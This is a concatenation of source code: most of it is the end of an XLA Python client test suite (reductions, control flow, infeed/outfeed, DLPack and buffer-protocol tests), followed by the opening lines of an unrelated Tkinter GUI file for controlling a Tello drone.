    operand = ops.Constant(
        c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
    window_dimensions = (2, 1)
    window_strides = (1, 2)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID,
        c.get_shape(operand).dimensions(), window_dimensions, window_strides)
    ops.SelectAndScatterWithGeneralPadding(
        operand,
        select=self._CreateBinaryGeComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        padding=padding,
        source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
        init_value=ops.Constant(c, np.array(1, dtype=dtype)),
        scatter=self._CreateBinaryAddComputation(dtype))
    self._ExecuteAndCompareClose(
        c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduce1DtoScalar(self, dtype):
    """Sum-reduction of a 1D vector to a scalar."""
    c = self._NewComputation()
    ops.Reduce(
        c,
        operands=[
            ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
        ],
        init_values=[ops.Constant(c, dtype(0))],
        computation=self._CreateBinaryAddComputation(dtype),
        dimensions_to_reduce=[0])
    self._ExecuteAndCompareClose(c, expected=[10])

  # TODO(phawkins): test comparison harness doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
      "dtype": dtype,
      "dim": dim,
  } for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
  def testReduce2DTo1D(self, dtype, dim):
    """Sum-reduction of a 2D array over each dimension matches np.sum."""
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    ops.Reduce(
        c,
        operands=[ops.Constant(c, input_array)],
        init_values=[ops.Constant(c, dtype(0))],
        computation=self._CreateBinaryAddComputation(dtype),
        dimensions_to_reduce=[dim])
    self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])

  @parameterized.named_parameters({
      "testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
      "dtype": dtype,
      "dims": tuple(dims)
  } for dtype in float_dtypes for dims in itertools.permutations(range(3)))
  def testReduce3DAllPossibleWaysF32(self, dtype, dims):
    """Sum-reduction of a 3D array over every axis permutation."""
    input_array = self._MakeSample3DArray(dtype)
    c = self._NewComputation()
    ops.Reduce(
        c,
        operands=[ops.Constant(c, input_array)],
        init_values=[ops.Constant(c, dtype(0))],
        computation=self._CreateBinaryAddComputation(dtype),
        dimensions_to_reduce=dims)
    self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduceWindowValidUnitStrides(self, dtype):
    """ReduceWindow, VALID padding, 2x1 windows, unit strides."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 1)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operand=ops.Constant(c, input_array),
        init_value=ops.Constant(c, dtype(0)),
        computation=self._CreateBinaryAddComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduceWindowSameUnitStrides(self, dtype):
    """ReduceWindow, SAME padding, 2x1 windows, unit strides."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 1)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operand=ops.Constant(c, input_array),
        init_value=ops.Constant(c, dtype(0)),
        computation=self._CreateBinaryAddComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduceWindowValidGeneralStrides(self, dtype):
    """ReduceWindow, VALID padding, 2x1 windows, stride 2 on dim 1."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 2)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operand=ops.Constant(c, input_array),
        init_value=ops.Constant(c, dtype(0)),
        computation=self._CreateBinaryAddComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])

  def testReduceWindowVariadic(self):
    """Variadic ReduceWindow: argmax-style (key, value) reducer over windows."""
    # Reducer over (key0, val0, key1, val1): keep the pair with the larger key.
    c = self._NewComputation("reducer")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
    shape = shape.with_major_to_minor_layout_if_absent()
    ps = [ops.Parameter(c, i, shape) for i in range(4)]
    which = ops.Ge(ps[0], ps[2])
    ops.Tuple(
        c, [ops.Select(which, ps[0], ps[2]),
            ops.Select(which, ps[1], ps[3])])
    reducer = c.build()

    key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
    val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 1)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operands=[ops.Constant(c, key_array),
                  ops.Constant(c, val_array)],
        init_values=[
            ops.Constant(c, np.int32(0)),
            ops.Constant(c, np.int32(0))
        ],
        computation=reducer,
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testWhile(self, dtype):
    """While doubles 1.0 until >= 10: 1 -> 2 -> 4 -> 8 -> 16."""

    def LessThan10Cond():
      c = self._NewComputation("test_lt_10")
      shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
      ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
      return c.build()

    cond = LessThan10Cond()
    body = self._CreateMulBy2Computation(dtype)
    c = self._NewComputation()
    init = ops.Constant(c, dtype(1.))
    ops.While(cond, body, init)
    self._ExecuteAndCompareClose(c, expected=[16.])

  def testConditionalTrue(self):
    """Conditional with a true predicate runs the true computation: 3*2=6."""
    c = self._NewComputation()
    pred = ops.Constant(c, np.bool_(True))
    true_operand = ops.Constant(c, np.float32(3.))
    true_computation = self._CreateMulBy2Computation(np.float32)
    false_operand = ops.Constant(c, np.float32(2.))
    false_computation = self._CreateConstantComputation(
        np.float32, np.float32)
    ops.Conditional(pred, true_operand, true_computation, false_operand,
                    false_computation)
    self._ExecuteAndCompareClose(c, expected=[6.])

  def testConditionalFalse(self):
    """Conditional with a false predicate runs the constant-one branch."""
    c = self._NewComputation()
    pred = ops.Constant(c, np.bool_(False))
    true_operand = ops.Constant(c, np.float32(3.))
    true_computation = self._CreateMulBy2Computation(np.float32)
    false_operand = ops.Constant(c, np.float32(2.))
    false_computation = self._CreateConstantComputation(
        np.float32, np.float32)
    ops.Conditional(pred, true_operand, true_computation, false_operand,
                    false_computation)
    self._ExecuteAndCompareClose(c, expected=[1.])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testInfeedS32Values(self):
    """Scalars pushed to the infeed queue are consumed in FIFO order."""
    to_infeed = NumpyArrayS32([1, 2, 3, 4])
    c = self._NewComputation()
    ops.GetTupleElement(
        ops.InfeedWithToken(
            ops.CreateToken(c),
            xla_client.shape_from_pyval(
                to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
    compiled_c = self.backend.compile(c.build())
    device = self.backend.local_devices()[0]
    for item in to_infeed:
      device.transfer_to_infeed(item)

    for item in to_infeed:
      result, = xla_client.execute_with_python_values(
          compiled_c, (), backend=self.backend)
      self.assertEqual(result, item)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testInfeedTuple(self):
    """A tuple value can be transferred through infeed in one shot."""
    to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
    c = self._NewComputation()
    ops.GetTupleElement(
        ops.InfeedWithToken(
            ops.CreateToken(c),
            xla_client.shape_from_pyval(
                to_infeed).with_major_to_minor_layout_if_absent()), 0)
    compiled_c = self.backend.compile(c.build())
    device = self.backend.local_devices()[0]
    device.transfer_to_infeed(to_infeed)

    result = xla_client.execute_with_python_values(
        compiled_c, (), backend=self.backend)
    self.assertLen(result, 2)
    np.testing.assert_equal(result[0], to_infeed[0])
    np.testing.assert_equal(result[1], to_infeed[1])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testInfeedThenOutfeedS32(self):
    """Values round-trip: infeed into the program, outfeed back unchanged."""
    to_round_trip = NumpyArrayS32([1, 2, 3, 4])
    c = self._NewComputation()
    x_and_token = ops.InfeedWithToken(
        ops.CreateToken(c),
        xla_client.shape_from_pyval(
            to_round_trip[0]).with_major_to_minor_layout_if_absent())
    x = ops.GetTupleElement(x_and_token, 0)
    token = ops.GetTupleElement(x_and_token, 1)
    outfeed_shape = xla_client.shape_from_pyval(
        to_round_trip[0]).with_major_to_minor_layout_if_absent()
    ops.OutfeedWithToken(x, token, outfeed_shape)
    compiled_c = self.backend.compile(c.build())
    device = self.backend.local_devices()[0]

    for want in to_round_trip:
      # Run the program on a separate thread: it blocks on infeed, which is
      # fed from this thread.
      execution = threading.Thread(target=lambda: compiled_c.execute([]))
      execution.start()
      device.transfer_to_infeed(want)
      got = device.transfer_from_outfeed(outfeed_shape)
      execution.join()
      self.assertEqual(want, got)

  def testScatter(self):
    """Scatter adds row updates into rows 0 and 2 of a 3x3 operand."""
    a = np.arange(9).astype(np.int32).reshape((3, 3))
    scatter_indices = np.array([0, 2], dtype=np.int32)
    updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)

    dnums = xla_client.ScatterDimensionNumbers()
    dnums.update_window_dims.append(1)
    dnums.inserted_window_dims.append(0)
    dnums.scatter_dims_to_operand_dims.append(0)
    dnums.index_vector_dim = 1

    c = self._NewComputation()
    ops.Scatter(
        ops.Constant(c, a), ops.Constant(c, scatter_indices),
        ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
        dnums)
    expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
                        dtype=np.int32)
    self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
  """Tests for the backend's device objects."""

  def testPlatform(self):
    """Every local device reports the same platform as its backend."""
    for device in self.backend.local_devices():
      self.assertEqual(device.platform, self.backend.platform)


tests.append(DeviceTest)
class ErrorTest(ComputationTest):
  """Tests that dtype mismatches at compile/execute time raise clear errors."""

  def setUp(self):
    super(ErrorTest, self).setUp()
    self.f32_scalar_2 = NumpyArrayF32(2.0)
    self.s32_scalar_2 = NumpyArrayS32(2)

  def testCompileWithWrongElementTypeInLayout(self):
    """Compiling with an f32 argument layout for an s32 parameter fails."""
    c = self._NewComputation()
    c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
    ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
    c.clear_op_metadata()

    options = xla_client.CompileOptions()
    options.argument_layouts = [
        xla_client.Shape.array_shape(np.dtype(np.float32), [])
    ]

    def TestFun():
      return self.backend.compile(c.build(), compile_options=options)

    self.assertRaisesRegex(
        RuntimeError, r".*Invalid argument shape.*"
        r"expected s32\[\], got f32\[\].*", TestFun)

  def testInvokeWithWrongElementType(self):
    """Executing with an f32 argument for an s32 parameter fails."""
    c = self._NewComputation()
    c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
    ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
    c.clear_op_metadata()

    def TestFun():
      return xla_client.execute_with_python_values(
          self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)

    self.assertRaisesRegex(
        RuntimeError, r"Invalid argument: Argument does not match.*"
        r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
  """Tests related to setting the root of the computation."""

  def testComputationRootDifferentFromLastOp(self):
    """build(result) roots the graph at `result`, ignoring the later Add."""
    c = self._NewComputation()
    x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
    result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
    ops.Add(result, ops.Constant(c, np.float32(1.618)))

    arg = NumpyArrayF32(1.0)
    compiled_c = self.backend.compile(c.build(result))
    ans, = xla_client.execute_with_python_values(
        compiled_c, [arg], backend=self.backend)
    # 1.0 + 3.14; the extra +1.618 op is not part of the rooted graph.
    np.testing.assert_allclose(ans, 4.14)


tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
  """Tests related to set OpSharding."""

  def testSetSharding(self):
    """Ops built under set_sharding still compile and execute correctly."""
    c = self._NewComputation()
    sharding = xla_client.OpSharding()
    sharding.type = sharding.type.REPLICATED
    sharding.tile_assignment_dimensions.extend([1])
    sharding.tile_assignment_devices.extend([0])
    # Only the parameter is built with the sharding attached.
    c.set_sharding(sharding)
    x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
    c.clear_sharding()

    result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
    ops.Add(result, ops.Constant(c, np.float32(1.618)))
    arg = NumpyArrayF32(1.0)
    compiled_c = self.backend.compile(c.build(result))
    ans, = xla_client.execute_with_python_values(
        compiled_c, [arg], backend=self.backend)
    np.testing.assert_allclose(ans, 4.14)


tests.append(SetShardingTest)
# Array shapes exercised by the DLPack and buffer-protocol round-trip tests
# below: scalar, vector, 2D/3D cases, zero-sized and singleton dimensions.
testcase_shapes = [
    (),
    (1,),
    (2, 3),
    (2, 0),
    (0, 7),
    (4, 1, 2),
    (2, 1, 3),
    (2, 4, 1),
    (3, 1),
    (1, 3),
]
def FormatShapeAndDtype(shape, dtype):
  """Returns a test-case name suffix such as "_float32[2,3]"."""
  dims = ",".join(str(dim) for dim in shape)
  dtype_name = np.dtype(dtype).name
  return "_{}[{}]".format(dtype_name, dims)
class DLPackTest(parameterized.TestCase):
  """Round-trip and ownership tests for the DLPack interop API."""

  def setUp(self):
    super(DLPackTest, self).setUp()
    self.backend = xla_backend()
    if self.backend.platform not in ("cpu", "gpu"):
      self.skipTest("DLPack requires CPU or GPU")

  # pylint: disable=g-complex-comprehension
  # pyformat: disable
  @parameterized.named_parameters({
      "testcase_name": "{}_own={}".format(FormatShapeAndDtype(shape, dtype),
                                          take_ownership),
      "dtype": dtype,
      "shape": shape,
      "take_ownership": take_ownership
  } for dtype in dlpack_dtypes for shape in testcase_shapes
    for take_ownership in [False, True])
  # pyformat: enable
  def testRoundTrip(self, dtype, shape, take_ownership):
    """Buffer -> DLPack capsule -> buffer preserves the array contents."""
    if dtype == np.bool_:
      x = np.random.randint(0, 2, size=shape).astype(np.bool_)
    else:
      x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
    buffer = self.backend.buffer_from_pyval(x)
    dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=take_ownership)
    del buffer  # Free "buffer" to make sure dlt retains ownership.
    self.assertEqual(type(dlt).__name__, "PyCapsule")
    y = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
    np.testing.assert_array_equal(
        x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())

  def testTensorsCanBeConsumedOnceOnly(self):
    """Importing the same DLPack capsule a second time raises."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=True)

    def ConsumeDLPackTensor():
      _ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)

    ConsumeDLPackTensor()
    self.assertRaisesRegex(
        RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
        ConsumeDLPackTensor)

  def testTensorsCanBeOwnedOnceOnly(self):
    """take_ownership=True deletes the buffer; exporting again must fail."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    _ = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=True)
    self.assertTrue(buffer.is_deleted())
    with self.assertRaisesRegex(
        RuntimeError,
        "Cannot convert deleted/invalid buffer to DLPack tensor.*"):
      _ = xla_client._xla.buffer_to_dlpack_managed_tensor(
          buffer, take_ownership=True)

  def testNonOwnedDlpackCanBeViewedTwice(self):
    """Non-owning exports may coexist and the source buffer stays valid."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=False)
    d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=False)

    y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
    z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
    del d1, d2
    np.testing.assert_array_equal(x, buffer.to_py())
    np.testing.assert_array_equal(x, y.to_py())
    np.testing.assert_array_equal(x, z.to_py())


tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
  """Tests numpy <-> device-buffer interop via the buffer protocol (CPU only)."""

  def setUp(self):
    super(BufferProtocolTest, self).setUp()
    self.backend = xla_backend()
    if self.backend.platform != "cpu":
      self.skipTest("Test requires CPU")

  # pylint: disable=g-complex-comprehension
  @parameterized.named_parameters({
      "testcase_name": FormatShapeAndDtype(shape, dtype),
      "dtype": dtype,
      "shape": shape
  } for dtype in standard_dtypes if dtype != bfloat16
    for shape in testcase_shapes)
  def testRoundTrip(self, dtype, shape):
    """ZERO_COPY aliases aligned host memory; ONLY_DURING_CALL copies."""
    x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
    x_ptr = x.__array_interface__["data"][0]
    buffer = self.backend.buffer_from_pyval(
        x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
    y = np.array(buffer, copy=False)
    y_ptr = y.__array_interface__["data"][0]
    np.testing.assert_array_equal(x, y)
    # If the input was sufficiently aligned, the input and output should
    # alias.
    self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
    self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())

    during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
    buffer2 = self.backend.buffer_from_pyval(
        x, host_buffer_semantics=during_call)
    z = np.array(buffer2, copy=False)
    # ONLY_DURING_CALL semantics must copy, so the addresses differ.
    self.assertNotEqual(x.__array_interface__["data"][0],
                        z.__array_interface__["data"][0])

  def testDeleteWithActiveView(self):
    """A live numpy view keeps a deleted buffer's storage alive."""
    x = np.random.randn(20, 10)
    buffer = self.backend.buffer_from_pyval(x)
    buffer_ptr = buffer.unsafe_buffer_pointer()
    y = np.array(buffer, copy=False)
    buffer.delete()
    # It is still legal to access `y`; the array view must keep it alive.
    np.testing.assert_array_equal(x, y)
    self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)


tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
  """Tests of traceback capture on buffers and executables."""

  def setUp(self):
    super(TracebackTest, self).setUp()
    self.backend = xla_backend()

  def testNoTracebacksIfDisabled(self):
    """With tracebacks disabled, nothing should record a traceback."""
    with xla_client.tracebacks(enabled=False):
      self.assertEqual(None, xla_client.Traceback.get_traceback())
      buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
      self.assertEqual(None, buffer.traceback)

      b = xla_client.XlaBuilder("computation")
      ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
      e = self.backend.compile(b.build())
      self.assertEqual(None, e.traceback)

  def assertIsTracebackContaining(self, tb, function):
    """Asserts `tb` is a Traceback whose frames mention `function`."""
    self.assertIsInstance(tb, xla_client.Traceback)
    self.assertIn(function, str(tb))
    self.assertTrue(any(f.function_name == function for f in tb.frames))

  def testTracebacks(self):
    """With tracebacks enabled, buffers/executables carry a traceback."""
    with xla_client.tracebacks(enabled=True):
      tb = xla_client.Traceback.get_traceback()
      self.assertIsTracebackContaining(tb, "testTracebacks")

      # Tracebacks are not implemented on the TPU driver extension's variant
      # of buffers and executables.
      if not isinstance(self.backend, xla_client.Client):
        return

      buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
      self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")

      b = xla_client.XlaBuilder("computation")
      ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
      e = self.backend.compile(b.build())
      self.assertIsTracebackContaining(e.traceback, "testTracebacks")

  def testNestedFunction(self):
    """Frames are ordered innermost-first around the AFunction frame."""

    def AFunction():

      def AnotherFunction():
        return xla_client.Traceback.get_traceback()

      return AnotherFunction()

    with xla_client.tracebacks(enabled=True):
      tb = AFunction()
    self.assertIsInstance(tb, xla_client.Traceback)
    frames = tb.frames
    i = next(
        i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
    self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
    self.assertEqual(frames[i + 1].function_name, "testNestedFunction")


tests.append(TracebackTest)
class ClientTest(parameterized.TestCase):
  """Tests of client-level properties (platform version strings)."""

  def setUp(self):
    super(ClientTest, self).setUp()
    self.backend = xla_backend()

  def testPlatformVersion(self):
    version = self.backend.platform_version
    if self.backend.platform == "cpu":
      # CPU backends report no meaningful version.
      self.assertEqual(version, "<unknown>")
    elif self.backend.platform == "gpu":
      # Following is false if not built with --config=cuda
      if test_util.is_gpu_available(cuda_only=True):
        # e.g. "cuda 11020" -- four or more digits after the space.
        self.assertTrue(
            re.match(r"^cuda \d{4,}$", version),
            msg=f"Expected CUDA version string; got {repr(version)}")
      else:
        self.assertEqual(version, "<unknown>")


tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
  """Tests related to DynamicReshape."""

  def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
                                    test_fn):
    """Compiles `builder`, executes on `args`, and checks each output.

    Every output buffer is compared against the matching entry of
    `expected_results` via to_py(); on CPU (bfloat16 excluded) the same
    comparison is repeated through the Python buffer protocol, and on
    other platforms memoryview() is asserted to raise BufferError.
    """
    compiled = self.backend.compile(builder.build())
    output_buffers = compiled.execute([
        self.backend.buffer_from_pyval(
            arg, device=compiled.local_devices()[0]) for arg in args
    ])
    self.assertLen(output_buffers, len(expected_results))
    for buf, expected in zip(output_buffers, expected_results):
      to_py_result = buf.to_py()
      self.assertEqual(expected.shape, to_py_result.shape)
      test_fn(expected, to_py_result)
      if self.backend.platform == "cpu" and buf.dtype != bfloat16:
        mview = memoryview(buf)
        self.assertEqual(expected.shape, mview.shape)
        test_fn(expected, np.asarray(mview))
      else:
        # Buffer protocol expected to fail on non-cpu platforms and bfloat16
        # Note that np.asarray(buf) doesn't throw an exception. To test if the
        # error was thrown properly we must use memoryview(buf).
        with self.assertRaises(BufferError):
          memoryview(buf)

  # 1D reshape of full size, half size, and size of 0.
  @unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
  @parameterized.parameters((5), (3), (0))
  def testReshape1D(self, reshape_size):
    """Reshapes iota(5) down to a dynamic prefix of length reshape_size."""
    full_size = 5
    c = self._NewComputation()
    arg = np.array(reshape_size, dtype=np.int32)
    expected = np.array(range(reshape_size), dtype=np.int32)
    p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
    ops.DynamicReshape(
        ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
        [True])
    self._CompareToPyAndBufferProtocol(c, [arg], [expected],
                                       np.testing.assert_equal)

  # 2D reshape with an slice on the minor dimension. We test different types
  # where the strides may differ between the host and devices. The reshaped
  # physical memory layout is not consecutive, and we test if the program can
  # return the correct logical view of the data.
  @unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testReshape2D(self, dtype):
    arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
    arg1 = np.array(2, dtype=np.int32)
    expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
    c = self._NewComputation()
    p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
    p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
    # Only the minor dimension (index 1) is dynamic.
    ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
    self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
                                       np.testing.assert_equal)

  @unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testDynamicShapeArgs(self, dtype):
    """Dynamically-shaped values can be passed into subcomputations."""
    full_size = 10
    dynamic_shape_size = 4
    # subcomputation 1: scalar binary add, used as the Reduce combiner.
    binary_add_builder = self._NewComputation()
    scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
    ops.Add(
        ops.Parameter(binary_add_builder, 0, scalar_shape),
        ops.Parameter(binary_add_builder, 1, scalar_shape))
    # subcomputation 2: reduce a dynamically-sized 1D parameter to a scalar.
    reshape_reduce_builder = self._NewComputation()
    dshape = xla_client.Shape.array_shape(
        np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
    reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
    ops.Reduce(
        reshape_reduce_builder,
        operands=[reshape_reduce_p],
        init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
        computation=binary_add_builder.build(),
        dimensions_to_reduce=[0])
    # main computation: sum(range(full_size)[:dynamic_shape_size])
    c = self._NewComputation()
    arg = np.array(dynamic_shape_size, dtype=np.int32)
    p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
    reshaped = ops.DynamicReshape(
        ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
        [full_size], [True])
    ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
    # 0 + 1 + 2 + 3 == 6 for dynamic_shape_size == 4.
    self._ExecuteAndCompareClose(c, [arg], [dtype(6)])


tests.append(DynamicReshapeTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
  """Materialize one concrete TestCase subclass per factory-produced class.

  The generated classes are injected into `globals_dict` (normally a test
  module's globals()) so the test runner can discover them.
  """
  # Avoid creating a new backend per test (this causes GPU OOM, and is
  # probably inefficient) by memoizing the backend constructor.
  backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
  for base in TestFactory(backend_fn, **kw):
    name = test_prefix + base.__name__
    subclass = type(name, (base,), {})
    # Strip the factory scope from the qualified name for readable output.
    subclass.__qualname__ = name
    globals_dict[name] = subclass
# Mapping from the --backend flag value to a client constructor.
backends = {
    "cpu": xla_client.make_cpu_client,
    "gpu": xla_client.make_gpu_client,
}

if __name__ == "__main__":
  flags.DEFINE_string("backend", "cpu", "Target platform.")
  # pylint: disable=unnecessary-lambda
  # The lambda defers the FLAGS lookup until after flag parsing.
  InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
  # pylint: enable=unnecessary-lambda
  absltest.main()
|
tello_control_ui.py | from PIL import Image
from PIL import ImageTk
import Tkinter as tki
from Tkinter import Toplevel, Scale
import threading
import datetime
import cv2
import os
import time
import platform
import tello_QR_code
import tello_num
class TelloUI:
    """Wrapper class to enable the GUI."""

    def __init__(self, tello, outputpath):
        """
        Initial all the element of the GUI,support by Tkinter

        :param tello: class interacts with the Tello drone.
        :param outputpath: directory where snapshot JPEGs are written.

        Raises:
            RuntimeError: If the Tello rejects the attempt to enter command mode.
        """
        self.tello = tello  # videostream device
        # the path that save pictures created by clicking the takeSnapshot button
        self.outputPath = outputpath
        self.frame = None  # frame read from h264decoder and used for pose recognition
        self.thread = None  # thread of the Tkinter mainloop
        self.stopEvent = None
        # QR-code state: code_flag becomes 1 once a QR code has been decoded
        self.code_flag = 0
        self.barcodeType = ''
        self.barcodeData = ''
